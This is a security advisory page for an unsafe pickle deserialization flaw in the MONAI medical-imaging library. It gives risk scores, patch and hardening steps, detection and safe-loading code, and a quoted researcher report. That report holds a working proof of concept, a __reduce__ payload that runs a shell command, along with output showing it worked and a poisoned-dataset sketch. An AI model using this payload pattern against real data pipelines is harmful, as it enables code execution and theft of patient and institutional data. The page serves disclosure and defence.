CVE-2025-58757: MONAI: unsafe pickle deserialization RCE in data pipeline

GHSA-p8cm-mm2v-gwjm HIGH PoC AVAILABLE CISA: ATTEND
Published September 9, 2025
CISO Take

Any MONAI-based medical AI pipeline loading datasets from external or shared sources is vulnerable to arbitrary code execution — no special permissions required from the attacker. Upgrade to MONAI 1.5.1 immediately and audit all data ingestion workflows. The medical research context (dataset sharing via Zenodo, GitHub, institutional repos) makes social engineering delivery trivially viable.

What is the risk?

Effective risk is HIGH despite a modest EPSS score. The vulnerability is trivially exploitable (a working PoC is published and no AI/ML expertise is required), the attack surface is broad (any DataLoader using list_data_collate with external data), and the target audience, medical AI researchers, skews toward lower security awareness. The project's 6k+ GitHub stars indicate significant real-world deployment. The CVE is not yet KEV-listed, but the published PoC shortens the likely time to exploitation.

What systems are affected?

Package   Ecosystem   Vulnerable Range   Patched
MONAI     pip         <= 1.5.0           1.5.1

8.3K · OpenSSF 6.7 · 110 dependents · Pushed 8d ago · 100% patched · ~15d to patch

Running MONAI 1.5.0 or earlier? You're affected.
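A quick way to check an environment against the vulnerable range is to compare the installed version with the patched release. The sketch below is a minimal illustration, not an official MONAI tool: the helper names (`parse_release`, `is_vulnerable`, `installed_monai_version`) are hypothetical, and the version parsing is deliberately simplified (pre-release suffixes such as `rc1` are ignored), so treat borderline results with care.

```python
from importlib import metadata

PATCHED = (1, 5, 1)  # first fixed release according to the table above


def parse_release(version: str) -> tuple:
    """Return the leading numeric components, e.g. '1.5.0rc1' -> (1, 5, 0)."""
    parts = []
    for piece in version.split("+")[0].split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break  # stop at the first non-numeric component (e.g. 'dev123')
        parts.append(int(digits))
    return tuple(parts)


def is_vulnerable(version: str) -> bool:
    """True if the version sorts before the patched release (simplified check)."""
    release = parse_release(version)
    padded = (release + (0, 0, 0))[:3]
    return padded < PATCHED


def installed_monai_version():
    """Return the installed MONAI version string, or None if it is not installed."""
    try:
        return metadata.version("monai")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    found = installed_monai_version()
    if found is None:
        print("MONAI is not installed in this environment")
    else:
        print(found, "VULNERABLE" if is_vulnerable(found) else "patched")
```

Running this in each training and preprocessing environment gives a first inventory. For production use, a full PEP 440 parser would handle pre-release and local versions more precisely than this sketch does.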

How severe is it?

CVSS 3.1: 8.8 / 10
EPSS: 0.6% chance of exploitation in 30 days (higher than 44% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

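Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High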

What should I do?

  1. PATCH

    Upgrade to MONAI >= 1.5.1 immediately (patches available in PR #8566, commit 948fbb7).

  2. AUDIT

    Inventory all deployments using monai.data.list_data_collate or monai.data.utils.pickle_operations with externally sourced data.

  3. HARDEN

    Enforce strict data provenance — only load datasets from cryptographically verified, internal sources until patched.

  4. SANDBOX

    Run data preprocessing in isolated containers/VMs without network access or credential exposure as compensating control.

  5. DETECT

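    Scan incoming datasets for pickle magic bytes (\x80\x04\x95, the header of a pickle protocol 4 stream) in non-model fields before loading. Treat this as a heuristic: payloads serialized with other pickle protocols start with different bytes and will not match.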

  6. FEDERATED LEARNING

    Treat this as critical if you accept data contributions from external partners — any contributed batch can now execute code on your training infrastructure.
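The DETECT step above can be made less dependent on one byte signature by parsing candidate values with the standard library's `pickletools.genops`, which walks pickle opcodes without executing them. The sketch below is an illustration under assumptions: it treats any key containing `_transforms` as a candidate (the pattern named in this advisory's exploitation scenario), and the helper names `imports_code` and `scan` are hypothetical. A match is a reason to quarantine a sample, not proof of malice.

```python
import pickle
import pickletools

SUFFIX = "_transforms"  # assumed key pattern, taken from the advisory text
IMPORT_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST"}  # opcodes that import a callable/class


def imports_code(blob: bytes) -> bool:
    """True if blob parses as a pickle stream that imports a callable or class."""
    try:
        return any(
            op.name in IMPORT_OPCODES for op, _arg, _pos in pickletools.genops(blob)
        )
    except Exception:
        return False  # not a well-formed pickle stream up to this point


def scan(sample, path="sample"):
    """Yield (path, imports_code) for each bytes value stored under a matching key."""
    if isinstance(sample, dict):
        for key, value in sample.items():
            here = f"{path}[{key!r}]"
            if isinstance(value, (bytes, bytearray)) and SUFFIX in str(key):
                yield here, imports_code(bytes(value))
            else:
                yield from scan(value, here)
    elif isinstance(sample, (list, tuple)):
        for index, item in enumerate(sample):
            yield from scan(item, f"{path}[{index}]")


if __name__ == "__main__":
    demo = {
        "image": "normal_image_data",
        "label_transforms": pickle.dumps(len),       # references builtins.len
        "meta": {"aug_transforms": pickle.dumps([1, 2])},  # plain data only
    }
    for location, suspicious in scan(demo):
        print(location, "imports code" if suspicious else "plain data")
```

Any bytes value under a matching key deserves attention, since that is what would be handed to `pickle.loads`; the `imports_code` flag only helps prioritise. Scanning is a compensating control and does not replace upgrading.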

What does CISA's SSVC say?

Decision: Attend
Exploitation: poc
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.7.3 - Data for AI systems
NIST AI RMF
GOVERN 6.1 - Supply Chain Risk Management
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-58757?

CVE-2025-58757 is an unsafe pickle deserialization flaw in MONAI (versions <= 1.5.0). The pickle_operations function in monai/data/utils.py passes dictionary values whose keys end with a specific suffix to pickle.loads() without validation, so a crafted dataset can execute arbitrary code when it is processed. Any MONAI-based medical AI pipeline that loads datasets from external or shared sources is exposed, and the attacker needs no special permissions. Upgrade to MONAI 1.5.1 and audit all data ingestion workflows.

Is CVE-2025-58757 actively exploited?

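No active exploitation is reported here: the CVE is not KEV-listed, and CISA's SSVC assessment rates exploitation as PoC. Proof-of-concept exploit code is publicly available for CVE-2025-58757, however, which increases the risk of exploitation.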

How to fix CVE-2025-58757?

  1. PATCH: Upgrade to MONAI >= 1.5.1 immediately (patches available in PR #8566, commit 948fbb7).
  2. AUDIT: Inventory all deployments using monai.data.list_data_collate or monai.data.utils.pickle_operations with externally sourced data.
  3. HARDEN: Enforce strict data provenance; only load datasets from cryptographically verified, internal sources until patched.
  4. SANDBOX: Run data preprocessing in isolated containers/VMs without network access or credential exposure as compensating control.
  5. DETECT: Scan incoming datasets for pickle magic bytes (\x80\x04\x95) in non-model fields before loading.
  6. FEDERATED LEARNING: Treat this as critical if you accept data contributions from external partners; any contributed batch can now execute code on your training infrastructure.

What systems are affected by CVE-2025-58757?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, federated learning.

What is the CVSS score for CVE-2025-58757?

CVE-2025-58757 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.60%.

What is the AI security impact?

Affected AI Architectures

training pipelines, data preprocessing pipelines, federated learning

MITRE ATLAS Techniques

AML.T0010.002 Data
AML.T0011 User Execution
AML.T0011.000 Unsafe AI Artifacts
AML.T0019 Publish Poisoned Datasets
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.7.3
NIST AI RMF: GOVERN 6.1
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

>To prevent this report from being deemed inapplicable or out of scope, due to the project's unique nature (for medical applications) and widespread popularity (6k+ stars), it's important to pay attention to some of the project's inherent security issues. (This is because medical professionals may not pay enough attention to security issues when using this project, leading to attacks on services or local machines.)

### Summary

The `pickle_operations` function in `monai/data/utils.py` automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using pickle.loads(). This function also lacks any security measures. When verified using the following proof-of-concept, arbitrary code execution can occur.

```
#Poc
from monai.data.utils import pickle_operations
import pickle
import subprocess

class MaliciousPayload:
    def __reduce__(self):
        return (subprocess.call, (['touch', '/tmp/hacker1.txt'],))

malicious_data = pickle.dumps(MaliciousPayload())
attack_data = {
    'image': 'normal_image_data',
    'label_transforms': malicious_data,
    'metadata_transforms': malicious_data
}
result = pickle_operations(attack_data, is_encode=False)
```

```
#My /tmp directory contents before running the POC
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  selenium-managersXRcjF  supervisor.sock  supervisord.pid
```

Before running the command, there was no hacker1.txt content in my /tmp directory, but after running the command, the command was executed, indicating that the attack was successful.

```
#Running Poc
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  selenium-managersXRcjF  supervisor.sock  supervisord.pid
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python r1.py
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  hacker1.txt  selenium-managersXRcjF  supervisor.sock  supervisord.pid
```

The above proof-of-concept is merely a validation of the vulnerability. The attacker creates malicious dataset content.

```
malicious_data = {
    'image': normal_image_tensor,
    'label': normal_label_tensor,
    'preprocessing_transforms': pickle.dumps(MaliciousPayload()),  # Malicious payload
    'augmentation_transforms': pickle.dumps(MaliciousPayload())  # Multiple attack points
}
dataset = [malicious_data, ...]
```

When a user batch-processes data using MONAI's list_data_collate function, the system automatically calls pickle_operations to handle the serialization transformations.

```
from torch.utils.data import DataLoader  # import assumed; the advisory omits it
from monai.data import list_data_collate

dataloader = DataLoader(
    dataset,
    batch_size=4,
    collate_fn=list_data_collate  # Trigger the vulnerability
)

# Automatically execute malicious code while traversing the data
for batch in dataloader:
    # Malicious code is executed in pickle_operations
    pass
```

When a user loads a serialized file from an external, untrusted source, the remote code execution (RCE) is triggered.

### Impact

Arbitrary code execution

### Repair suggestions

Verify the data source and content before deserializing, or use a safe deserialization method, which should have a similar fix in huggingface's transformer library.
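One form the "safe deserialization method" in the repair suggestion could take is the restricted-unpickler pattern from the Python `pickle` documentation, which overrides `Unpickler.find_class` so that a stream cannot import arbitrary callables. The sketch below is illustrative only and is not claimed to be what the MONAI patch does; `DataOnlyUnpickler`, `safe_loads`, `ALLOWED`, and `Probe` are hypothetical names, and the demo payload uses `print` instead of a shell command.

```python
import io
import pickle

# (module, name) pairs that may be imported during unpickling.
# Empty means only plain data (numbers, strings, lists, dicts, ...) is accepted.
ALLOWED = set()


class DataOnlyUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import anything outside the ALLOWED set."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_loads(blob: bytes):
    """Deserialize blob, raising UnpicklingError if it tries to import a global."""
    return DataOnlyUnpickler(io.BytesIO(blob)).load()


class Probe:
    """Harmless stand-in for the advisory's MaliciousPayload class."""

    def __reduce__(self):
        return (print, ("payload ran",))


if __name__ == "__main__":
    print(safe_loads(pickle.dumps({"spacing": [1.0, 1.0, 2.5]})))
    try:
        safe_loads(pickle.dumps(Probe()))
    except pickle.UnpicklingError as err:
        print("rejected:", err)
```

The import is rejected before the payload's callable is ever resolved, so the `__reduce__` call never runs. An allowlist that is too generous reopens the hole, which is why the sketch starts with an empty set.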

Exploitation Scenario

An attacker publishes a convincing medical imaging dataset (chest X-ray, MRI segmentation) to a public repository such as Zenodo, HuggingFace Datasets, or a GitHub release. The dataset's JSON/HDF5 metadata stores pickle payloads as values under dictionary keys suffixed with '_transforms' (e.g., 'preprocessing_transforms', 'augmentation_transforms'). A medical AI researcher clones the repo and runs a standard MONAI training script. The moment the DataLoader iterates the first batch, list_data_collate triggers pickle_operations, which executes the payload. The attacker gains persistent access to the researcher's workstation or GPU cluster and can potentially exfiltrate trained models, patient data, and institutional credentials, or pivot to connected hospital systems.

Weaknesses (CWE)

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

  • [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
  • [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
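The first mitigation above (signing serialized data) can be sketched with the standard library's `hmac` module: the producer prepends an HMAC-SHA256 tag to the pickled bytes, and the consumer verifies the tag before calling `pickle.loads`. This is a minimal sketch under assumptions: `seal` and `unseal` are hypothetical helper names, and key distribution is out of scope. It only proves the bytes came from a key holder, so anyone with the key can still craft a malicious payload.

```python
import hashlib
import hmac
import pickle

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def seal(obj, key: bytes) -> bytes:
    """Serialize obj and prepend an HMAC-SHA256 tag computed over the payload."""
    payload = pickle.dumps(obj)
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload


def unseal(blob: bytes, key: bytes):
    """Verify the tag first; deserialize only if it matches."""
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("HMAC mismatch: refusing to deserialize")
    return pickle.loads(payload)


if __name__ == "__main__":
    key = b"demo-key-do-not-use-in-production"
    sealed = seal({"applied": ["flip", "rotate"]}, key)
    print(unseal(sealed, key))
```

Verification happens before any byte reaches the unpickler, which is the property that matters here: tampered or unsigned data is rejected without being parsed.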

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
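As a worked check, the 8.8 base score can be reproduced from this vector using the base-score equations and metric weights from the CVSS v3.1 specification. The sketch below handles only Scope: Unchanged vectors, which is all this CVE needs; the function names are illustrative.

```python
import math

# Metric weights from the CVSS v3.1 specification (PR values are for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score for a Scope: Unchanged vector."""
    parts = dict(item.split(":") for item in vector.split("/"))
    if parts.get("CVSS") != "3.1" or parts.get("S") != "U":
        raise ValueError("this sketch handles only CVSS 3.1 vectors with S:U")
    w = {metric: WEIGHTS[metric][parts[metric]] for metric in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))
```

For this vector the impact sub-score is about 5.87 and the exploitability sub-score about 2.84; their sum, roughly 8.71, rounds up to 8.8. The UI:R metric is what keeps the score below the 9.8 that the same vector would receive with UI:N.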

Timeline

Published: September 9, 2025
Last Modified: September 26, 2025
First Seen: March 24, 2026

Related Vulnerabilities